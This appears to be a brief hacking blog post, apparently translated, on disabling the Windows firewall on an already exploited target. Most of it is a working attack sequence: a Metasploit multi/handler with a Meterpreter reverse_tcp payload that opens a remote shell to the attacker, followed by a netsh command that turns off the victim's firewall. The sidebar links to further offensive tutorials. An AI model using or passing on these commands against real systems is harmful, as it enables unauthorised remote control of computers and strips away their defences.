if you do exploit on the windows Operating system, and find it turn out firewall on the target of computer still in enable status, so we need do that different attack to disable Firewall for easily we activity.
use multi/handler set payload windows/meterpreter/reverse_tcp set lhost IP_KITA set lport 8080 exploit shell netsh firewall set opmode disable
NOTE : this not my experience because i just write article that i find again to the other language.
Recent Posts
- How To Sniffing with ettercap
- how to exploit windows 7 and windows XP using backtrack 5
- conduct exploitation of the Windows Xp and exploitation windows 7 Creating a backdoor with x86/shikata_ga_na
- DOS attacks .htaccess and Solutions
- Detection Port Scanner with portsentry
- How To Overcome Backtrack Blank Screen when typing startx
- Stages of Forensic Activity
- about IT Forensic
- Solution msfconsole & msfupdate are not running after updating to 4.5.0 metasploit bt0
- How To Upgrade to BackTrack 5 R3